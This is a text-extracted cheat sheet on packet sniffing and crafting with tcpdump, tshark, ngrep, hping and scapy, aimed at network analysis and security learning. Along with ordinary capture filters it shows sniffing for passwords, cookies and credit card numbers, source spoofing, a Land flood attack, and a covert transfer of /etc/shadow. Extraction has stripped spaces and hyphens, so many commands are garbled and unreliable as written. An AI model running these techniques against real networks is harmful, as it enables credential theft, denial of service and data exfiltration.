You are on page 1of 10

http://theinterw3bs.com/docs/PacketSniffCraft-CheatSheet.

pdf

TCP/IPStack
Application
TCPHeader
IPHeader
EthernetFrameHeader

-------------|XXXXXXXXXXXX|
-------------------------------|XXXX|
DATA
|
-----------------------------------------|XXXX|
DATA
|
--------------------------------------------------|XXXX|
DATA
|
-----------------------------

Application Layer
HTTP, DNS, SSH
Port#'s, Seq#'s, Flags
Transport Layer 4
Protocol, IP's, Options
Network Layer 3
Src & Dst MACs
Link Layer 2

IPHEADER
0
15 16
31
---------------------------------------------------------------| Ver. | IHL |
TOS
|
total length
|
---------------------------------------------------------------|
Identification
| Flags |
Fragment Offset
|
---------------------------------------------------------------| Time to Live | Protocol
|
Header Checksum
|
---------------------------------------------------------------|
Source IP Number
|
---------------------------------------------------------------|
Destination IP Number
|
---------------------------------------------------------------|
Options and Padding
|
---------------------------------------------------------------|
Data
|
---------------------------------------------------------------|
Destination IP Number
|
----------------------------------------------------------------

TCPHEADER
0
15
31
----------------------------------------------------------------|
source port
|
destination port
|
----------------------------------------------------------------|
sequence number
|
----------------------------------------------------------------|
acknowledgment number
|
----------------------------------------------------------------| HL
| rsvd |C|E|U|A|P|R|S|F|
window size
|
----------------------------------------------------------------|
TCP checksum
|
urgent pointer
|
-----------------------------------------------------------------

TCP3WayHandshake

1.CallersendsSYN
2.RecipientrespondswithSYN,ACK
3.CallersendsACK

TCPDump
TCPFlags=PSH,RST,SYN,FIN,ACK,URG,ECN,.aperiodmeansnoflagsset
#tcpdumplieth1

Timestamp

SourceAddr.Port DestAddr.Port

Flag

Beg.Seq#:End.Seq#

Payload
Bytes
BufferSize

15:11:51.118721IP192.168.1.2.36244>theinterw3bs.com.https:S2174322146:2174322146(0)win5840<mss
1460,sackOK,timestamp675901874[|tcp]>
15:11:51.202980IPtheinterw3bs.com.https>192.168.1.2.36244:S702917543:702917543(0)ack2174322147win5792<mss
1460,sackOK,timestamp440206555[|tcp]>
15:11:51.203020IP192.168.1.2.36244>theinterw3bs.com.https:.ack1win46<nop,nop,timestamp675901959440206555>
15:12:12.252284IP192.168.1.2.55671>192.168.1.1.domain:54150+[|domain]
15:12:12.252290IP192.168.1.1.domain>192.168.1.2.55671:54150NXDomain*[|domain]
15:12:13.252299STP802.1d,Config,Flags[none],bridgeid8000.00:07:eb:69:8e:40.800e,length43
15:13:12.814465IPlocalhost>localhost:ICMPechorequest,id21836,seq1,length64
15:13:12.814484IPlocalhost>localhost:ICMPechoreply,id21836,seq1,length64
16:08:13.47299400:30:67:0b:34:ea(ouiUnknown)>00:18:f8:70:9a:3b(ouiUnknown),ethertypeIPv4(0x0800),length66:
192.168.1.2.39545>theinterw3bs.com.https:.ack841win71<nop,nop,timestamp679284229441052237>
0x0000:45000034de7340004006baf7c0a80102
0x0010:cdc4d2e99a7901bbda39dff281ad7035
0x0020:801000474fc000000101080a287d0e05
0x0030:1a49ec4d

UsefulTcpDumpcommands
Captureoneth0anddisplayhexandASCIItoscreen
#tcpdumpXlieth0

Capture,don'tresolveIPs
#tcpdumpnlieth0

Capture,don'tresolveIPsandportnumbers
#tcpdumpnnlieth0

Captureandsavetoapcapfile
#tcpdumplieth0woutput.pcap

Captureandsavetoapcapfilebutlimitto200packets
#tcpdumplieth0c200woutput.pcap

Capture,printlinklevelheaderandsetunlimitedsnaplengthtocapturewholepacketandwritepacket
#pdumpes0lieth0woutput.pcap

Readcapturedfile,printlinklevelheader,unlimitedsnaplen,Ascii,veryverboseanddon'tresolve
ips/ports
#tcpdumpes0Xnnvvroutput.cap

OnlydisplayIPpackets

#tcpdumpnneroutput.capip

OnlydisplayARPpackets
#tcpdumpnneroutput.caparp

OnlydisplayTCPpackets
#tcpdumpnneroutput.captcp
OnlydisplayUDPpackets
#tcpdumpnneroutput.capudp

OnlydisplayICMPpackets
#tcpdumpnneroutput.capicmp

Captureonlyport80traffic

#tcpdumpes0nnlieth0srcordstport80

Capturetrafficwithaportrange
#tcpdumptcpportrange2024

CaptureonlytrafficfromIP192.168.1.1
#tcpdumpes0nnlieth0host192.168.1.1

Capturetcpport80orudpdnsorvpn
#tcpdumpes0ieth0tcpport80orudp\(53or10000\)

CapturetrafficonlyfromaMACaddress
#tcpdumpetherhost11:22:33:44:55:66

Capture,butdon'tshowping/icmpechorequest/replies
#tcpdumplieth0icmp[0]!=8andicmp[0]!=0

UsefulTSharkCommands
TSharkisabletodetect,readandwritethesamecapturefilesthataresupportedbyWireshark.TSharkcan
displaypacketstatistics,conversations,heirarchyandsupportsmoretypesofcaptureformatsthantcpdump
does.TShark/Wireshark'sfiltersareusuallyeasiertounderstandandwritethanTCPDump.
Capturing
Captureoneth0anddisplayhexandASCIItoscreen
#tsharkxieth0

Capture,don'tresolveIPs
#tsharkxnieth0

Captureandsavetoapcapfile
#tsharkieth0woutput.pcap

Capturealltheinterw3bs.comtrafficthatisNOT443or22
#tsharkhosttheinterw3bs.comandnot(port443orport22)

Capturefora10secondinterval

#tsharkaduration:10ieth1wtimed.cap

Ringbuffercaptureoneth1intoanunlimitednumberof1kfilesprefixedwiththename'test'andthe
extensionof.pcap
#tsharkbfiles:0afilesize:1ieth1wtest.pcap
rw1rootroot1.7KSep517:49test_00001_20090905174954.pcap
rw1rootroot1.4KSep517:49test_00002_20090905174958.pcap
rw1rootroot1.1KSep517:49test_00003_20090905174958.pcap

Capture,setsmallersnaplengthandwritepacket
#tsharkxs68ieth1woutput.pcap

Readcapture,showPacketDetailsandHex/ASCII
#tsharkrtest.pcapxV

DisplayonlyPort80or443traffic

#tsharkxVrtest.pcaptcp.porteq80ortcp.porteq443

DisplayPortRange80thru443
#tsharkrtest.pcapportrange80443

Readandshowport443ORICMPtrafficonly
#sharkrtest.pcaptcp.porteq443oricmp

OnlydisplayIPpackets
#tsharkroutput.capip

OnlydisplayTCPpackets
#tsharkroutput.caphttp

OnlydisplayUDPpackets
#tsharkroutput.capudp

OnlydisplayARPpacketsfromMACaddressX:X:X:X:X:X
#tsharkrtest.pcaparpandeth.src==00:BB:CC:DD:EE:FF

Readandonlyshowcertainsrcanddstsubnets

#tsharkrtest.pcapip.src==192.168.0.0/16andip.dst==192.168.0.0/16
119.305983192.168.1.2>192.168.1.1DNSStandardqueryAtheinterw3bs.com
129.464772192.168.1.1>192.168.1.2DNSStandardqueryresponseA205.196.210.233

DisplayonlytrafficDestinedto192.168.1.3thru..1.100

#tsharkrtest.pcap'ip.dst>=192.168.1.3andip.dst<192.168.1.100'

ReadandprintonlyHTTPtrafficwiththestringCookie
#tsharkxVrtest.pcapR'httpcontains"Cookie"'

ReadandprintonlyHTTPtrafficthatcontainedabinaryfileorpossibleexecutable
#tsharkxVrtest.pcapR'httpcontains"application/xml"'

Capture,butdon'tshowping/icmpechorequest/replies
#tsharkrping.pcapnoticmp.type==0andnoticmp.type==8

TSharkStatistics

DisplayProtocolHeirarchyStats
#tsharkrtest.pcapnqzio,phs
===================================================================
ProtocolHierarchyStatistics
Filter:frame
frameframes:804bytes:522855
ethframes:804bytes:522855
llcframes:22bytes:1661
stpframes:21bytes:1260
cdpframes:1bytes:401
arpframes:11bytes:642
ipframes:771bytes:520552
udpframes:34bytes:6794
dataframes:12bytes:4804
dnsframes:22bytes:1990
tcpframes:737bytes:513758
httpframes:6bytes:3019
datatextlinesframes:2bytes:1562
tcp.segmentsframes:63bytes:77026
httpframes:2bytes:1581
datatextlinesframes:2bytes:1581
sslframes:61bytes:75445
sslframes:320bytes:393333
===================================================================

HTTPStatistics

#tsharkrtest.pcapnqzhttp,stat,
===================================================================
HTTPStatistics
*HTTPStatusCodesinreplypackets
HTTP200OK
*ListofHTTPRequestmethods
GET2
POST2
===================================================================

HTTPTreeStatistic

#tsharkrtest.pcapnqzhttp,tree
===================================================================
HTTP/PacketCountervalue ratepercent

TotalHTTPPackets80.000604
HTTPRequestPackets40.00030250.00%

GET20.00015150.00%
POST20.00015150.00%
HTTPResponsePackets20.00015125.00%
???:broken00.0000000.00%
1xx:Informational00.0000000.00%
2xx:Success20.000151100.00%
200OK20.000151100.00%
3xx:Redirection00.0000000.00%
4xx:ClientError00.0000000.00%
5xx:ServerError00.0000000.00%
OtherHTTPPackets20.00015125.00%
===================================================================

DisplayConversations
zconv,type[,filter]

eth"Ethernet,"fc"FibreChannel,"fddi"FDDI,"ip"IPaddresses,"ipx"IPXaddresses,"tcp"TCP/IP,
"tr"TokenRing,"udpUDP/IP
#tsharkrtest.pcapzconv,ip,tcp.port==80zconv,ip,tcp.port==443
================================================================================
IPv4Conversations
Filter:tcp.port==443
|<||>||Total|
|FramesBytes||FramesBytes||FramesBytes|
205.196.210.233<>192.168.1.230246376351437171653483547
192.168.1.2<>76.13.6.20882467101820184287
================================================================================
================================================================================
IPv4Conversations
Filter:tcp.port==80
|<||>||Total|
|FramesBytes||FramesBytes||FramesBytes|
205.196.210.233<>192.168.1.222247920172654219744
192.168.1.2<>76.13.6.191103762142418246180
================================================================================

MergecapCommands
Combinesmultipledumpsintoonesingledumpfile.Packetsarewrittenintotheoutputfileinatimestamp
orderedmannerunlessspecifiedwiththeaoption.
Packetsmergedintimestamporderregardlessofinputorder.
#mergecaptest_00132_20090905175007.captest_00131_20090905175007.capwblah.out

Packetsmergedoutoftimestamporder
#mergecapatest_00132_20090905175007.captest_00131_20090905175007.capwblah.out
Setencapsulationtypetoieee80211radiotap.Twilllistencaptypes.
#mergecaptieee80211radiotap

SimpleSearchingforcleartextusingStrings
Displayprintablelineswithaminimumof10characterssearchingforthewordcookieorpasswordand
outputtoafile
#stringsn10test.pcap|egrepi"cookie|password">goodies.txt

Sameasabovebutprintthetext2linesaboveandbelow

#stringsn10test.pcap|egrepA2B2i"cookie|password">goodies.txt

Searchforpossibleexedownloads
#stringstest.pcap|egrepA3B3i"application/octetstream>evilcrap.txt

NgrepCommands

ngrepstrivestoprovidemostofGNUgrep'scommonfeatures,applyingthemtothenetworklayer.
Listenonanydeviceforanyport22traffic(srcordst)
#ngrepdanyport22

Listenonanydeviceforanyport2traffic(srcordst)anddoawordregexcaseinsensisitivesearchfor
theworduserorpass.
#ngrepwidany'user|pass'port21

ReadfileanddisplayGETorPOSTrequestsdestinedtoIP:80anddisplayinbylinemode
#ngrepWbylinet'^(GET|POST)''dsthost205.196.210.233anddstport443'Itest.pcap
input:test.pcap
filter:(ip)and(dsthost205.196.210.233andtcpanddstport80)
match:^(GET|POST)
###
T2009/09/0614:47:54.972574192.168.1.2:50578>205.196.210.233:80[AP]
GET/HTTP/1.1.
Host:theinterw3bs.com.
UserAgent:Mozilla/5.0(X11;U;Linuxi686(x86_64);enUS;rv:1.9.1.2)Gecko/20090729Firefox/3.5.2.
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.
AcceptLanguage:enus,en;q=0.5.
AcceptEncoding:gzip,deflate.
AcceptCharset:ISO88591,utf8;q=0.7,*;q=0.7.
KeepAlive:300.
Connection:keepalive.
Cookie:wpsettingstime3=148789672;wpsettings1=editor%3Dhtml%26align%3Dnone;wpsettingstime1=1842864230.
#######

Readintest.pcap,searchHTTPtrafficforMIMEtypeoctetstream,printthetimedifferentialwriteoutput
toafileanddisplayinbylineformat
#ngrepItest.pcapOout.pcapwidany'application/octetstream'TporthttpWbyline

Readintest.pcap,searchHTTPtrafficforthehexidecimalvalueequaltotheMIMEtype
application/octetstream
ngrepItest.pcapxX'6170706c69636174696f6e2f6f637465742d73747265616d'

Listenonanydevice,writeoutoutputandsearchforCreditCardnumbers.Ihaven'ttestedthisyet
MasterCard:^5[15][09]{14}$MasterCard'sstartwith5155andcontain16digits
Visa:^4[09]{14}$Visa'sstartwitha4.Moderncardshave16digits
AmericanExpress:^3[47][09]{13}$AmericanExpresscard'sstartwith34or37andhave15digits
Discover:^6(?:011|5[09]{2})[09]{12}$Discovercardnumbersbeginwith6011or65andhave16digits
#ngrepOout.pcapwdany"((5[15]\d{2}|(4\d{3})|6(?:011|5[09]{2}))?\d{12}|3[47]\d{13}
#ngrepOout.pcapwdany"((5[15]\d{2})|(4\d{3})|6(?:011|5[09]{2}))?\d{4}?\d{4}?\d{4}|3[47]\d{13}

HpingCommands
Afewscantypes
Ffin
Ssyn
Rrst
Ppush
Aack
Uurg
Xxmas
Yymas

Send2SYNpacketstoport80.Sincenothingislisteningonport80aResetACKisreturned
#hpingS192.168.1.2c2p80
HPING192.168.1.2(eth1192.168.1.2):Sset,40headers+0databytes
len=40ip=192.168.1.2ttl=64DFid=0sport=80flags=RAseq=0win=0rtt=0.1ms
len=40ip=192.168.1.2ttl=64DFid=0sport=80flags=RAseq=1win=0rtt=0.0ms

PerformafastSYNportscanagainstanIP.LookforSAflagtodetermineopenports
#hpingS192.168.1.2p++0fast
HPING192.168.1.2(eth1192.168.1.2):Sset,40headers+0databytes
len=40ip=192.168.1.2ttl=64DFid=0sport=0flags=RAseq=0win=0rtt=0.0ms
len=40ip=192.168.1.2ttl=64DFid=0sport=1flags=RAseq=1win=0rtt=0.0ms

len=40ip=192.168.1.2ttl=64DFid=0sport=21flags=RAseq=21win=0rtt=0.1ms
len=44ip=192.168.1.2ttl=64DFid=0sport=22flags=SAseq=22win=32792rtt=0.1msthisportisopen

PerformaSYNscanbutwait5minutesbetweeneachport
#hpingS192.168.1.2p++0i300

PerformafastSYNscanagainstspecificportsbutonlydisplaytheSynAcks.
#hpingS192.168.1.282123,80,135139,443,445fast
Scanning192.168.1.2(192.168.1.2),port2123,80,135139,443,445
11portstoscan,useVtoseeallthereplies
+++++++
|port|servname|flags|ttl|id|win|
+++++++
22ssh:.S..A...64032792
Allrepliesreceived.Done.
Notrespondingports:

SpoofingtheSourceaddress

#hping2S192.168.1.2p22a1.1.1.1Ilo
#tsharknilotcp
0.0000001.1.1.1>192.168.1.2TCP2387>22[SYN]Seq=0Win=512Len=0

DeterminingtheSequenceNumbersandincrements
#hping2S192.168.1.2Qp22
HPING192.168.1.2(eth1192.168.1.2):Sset,40headers+0databytes
2342034982+2404187
2373540265+31505283
2386374080+12833802
2403059765+16685677

Listenoneth1anddisplayanyHTTPtraffic
#hping29HTTPIeth1

Listenoneth1anddisplayanytrafficwithhttp://theinterw3bs.cominit.
#hping29"http://theinterw3bs.com"Ieth1

PerformaLandAttack(ADoSattackwherethesourceanddestarethesame).Floodoptioninhping3
#hping3S192.168.1.2a192.168.1.2ks139p139flood
#hping2S192.168.1.2a192.168.1.2ks139p139c1000
#hping2192.168.1.2fastp80Sc100000

Pipingcharactersofdatatohping2
#echo"blahblahblah">blah.txt
#wcblah.txt
1113blah.txt
#hping2d13Eblah.txt127.0.0.1p22
#tsharkxniloport22
0.000000127.0.0.1>127.0.0.1SSHEncryptedrequestpacketlen=13
000000000000000000000000000008004500..............E.
00100035b9ca00004006c2f67f0000017f00.5....@.........
002000010bc9001675688a4e1f63af085000......uh.N.c..P.
0030020080550000626c6168626c6168626c...U..blahblahbl
004061680aah.

Transferafile
Sendthe/etc/shadowfilewithasignaturenameof'evilsig'
#hping21127.0.0.1eevilsigE/etc/shadowd1000

Listenandsavethefile
#hping21127.0.0.19evilsigIlocalhost>notgood.txt

ScapyCommands

APythonAPIforrawpacketcrafting,packetsniffingandpacketalteration.Itallowsyoutodirectlyusepythonto
assignvariables,useloops,definefunctions,etc.Supportsalargenumberofdifferentprotocols.
FromthescapysiteScapycaneasilyhandlemostclassicaltaskslikescanning,tracerouting,probing,unittests,
attacksornetworkdiscovery(itcanreplacehping,85%ofnmap,arpspoof,arpsk,arping,tcpdump,tethereal,
p0f,etc.).Italsoperformsverywellatalotofotherspecifictasksthatmostothertoolscan'thandle,likesending
invalidframes,injectingyourown802.11frames,combiningtechnics(VLANhopping+ARPcachepoisoning,
VOIPdecodingonWEPencryptedchannel,...),etc.
RunningScapy.
Typels()toseesupportedprotocols.
#scapy
WelcometoScapy(2.0.1)
>>>ls()
ARP:ARP
ASN1_Packet:None
BOOTP:BOOTP
CookedLinux:cookedlinux
DHCP:DHCPoptions
DNS:DNS
DNSQR:DNSQuestionRecord
DNSRR:DNSResourceRecord

X509Cert:None
X509RDN:None
X509v3Ext:None

>>>ls(IP)
version:BitField=(4)
ihl:BitField=(None)
tos:XByteField=(0)
len:ShortField=(None)
id:ShortField=(1)
flags:FlagsField=(0)
frag:BitField=(0)
ttl:ByteField=(64)
proto:ByteEnumField=(0)
chksum:XShortField=(None)
src:Emph=(None)
dst:Emph=('127.0.0.1')
options:IPoptionsField=('')
>>>ls(TCP)
sport:ShortEnumField=(20)
dport:ShortEnumField=(80)
seq:IntField=(0)
ack:IntField=(0)
dataofs:BitField=(None)
reserved:BitField=(0)
flags:FlagsField=(2)
window:ShortField=(8192)
chksum:XShortField=(None)

urgptr:ShortField=(0)
options:TCPOptionsField=({})
Typelsc()toseesupportedcommands.

sendpsendatlayer2
sendsendatlayer3
srpsendandreceiveatlayer2
srsendandreceiveatlayer3
srp1sendandreceiveonly1responseatlayer2
sr1sendandreceiveonly1responseatlayer3
SendaSYNpackettoanIPfromsourceport1024anddestinationport445
>>>send(IP(dst="192.168.1.3")/TCP(sport=1024,dport=445,flags='S'))
Sent1packets

Listeningonhost192.168.1.3

#tsharkhost192.168.1.2
Capturingoneth0
0.000000192.168.1.2>192.168.1.3TCP1024>microsoftds[SYN]Seq=0Win=8192Len=0
0.000130192.168.1.3>192.168.1.2TCPmicrosoftds>1024[RST,ACK]Seq=1Ack=1Win=0Len=0

SendthesameasabovebutwithanURGflagset,aseq#andwindowsize

>>>send(IP(dst="192.168.1.3")/TCP(sport=1024,dport=445,flags='R',seq=12345,window=65535))

Listeningonhost192.168.1.3
417.768881192.168.1.3>192.168.1.2TCP[TCPKeepAlive]1024>microsoftds[URG]Seq=0Win=65535Urg=0Len=0
417.768979192.168.1.2>192.168.1.3TCPmicrosoftds>1024[RST,ACK]Seq=1Ack=0Win=0Len=0

SendandListenMode
>>>sr1(IP(dst="192.168.1.3")/ICMP(type=8))
Beginemission:
Finishedtosend1packets.
.*
Received1packets,got1answers,remaining0packets
<IPversion=4Lihl=5Ltos=0x0len=28id=5073flags=frag=0Lttl=63proto=icmpchksum=0x815bsrc=192.168.1.3
dst=192.168.1.2options=''|<ICMPtype=echoreplycode=0chksum=0xffffid=0x0seq=0x0|<Padding
load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'|>>>

Listeningonhost192.168.1.3

2042.739458192.168.1.2>192.168.1.3ICMPEcho(ping)request
2042.739562192.168.1.3>192.168.1.2ICMPEcho(ping)reply

TCP3WayHandshake
>>>sr1(IP(dst="192.168.1.3")/TCP(flags="S",dport=80,sport=5556,seq=9000))
Beginemission:
Finishedtosend1packets.
.*
Received2packets,got1answers,remaining0packets
<IPversion=4Lihl=5Ltos=0x0len=44id=0flags=DFfrag=0Lttl=63proto=tcpchksum=0x5517src=192.168.1.3
dst=192.168.1.2options=''|<TCPsport=httpdport=5556seq=2216395141Lack=9001dataofs=6Lreserved=0L
flags=SAwindow=5840chksum=0x5bc3urgptr=0options=[('MSS',1460)]|<Paddingload='\x00\x00'|>>>
Settingvariables
>>>a=IP(dst="192.168.1.3")
>>>a
<IPdst=192.168.1.3|>

>>>a.dst
'192.168.1.3'
TestSendingapacket
>>>a=IP(dst="192.168.1.3")
>>>b=TCP(flags="S",dport=80,sport=5556,seq=9000)
>>>packet=a/b
>>>send(a/b)
Sent1packets.
Addingapayload
>>>packet=IP(dst="192.168.1.3")/TCP(flags="S",dport=80,sport=5556,seq=9000)/"GETindex.html
HTTP/1.1\r\n\r\n"
>>>sr(packet)
Beginemission:
Finishedtosend1packets.
*
Received1packets,got1answers,remaining0packets
(<Results:TCP:1UDP:0ICMP:0Other:0>,<Unanswered:TCP:0UDP:0ICMP:0Other:0>)
MultipleHosts
>>>sr(IP(dst=["192.168.1.3","192.168.1.4"])/ICMP(type=8))
MultiplePackets
>>>send([packet]*7)
.......
Sent7packets.
Indefinitelooping
>>>send([packet],loop=1)
ReplayPcaptraffic
>>>send(rdpcap("/tmp/out.pcap"))
Fuzzingvaluesnotexplicitlylisted
>>>sr(IP(dst=["192.168.1.3","192.168.1.4"])/fuzz(ICMP(code=0)))
Beginemission:
Finishedtosend2packets.
............................^C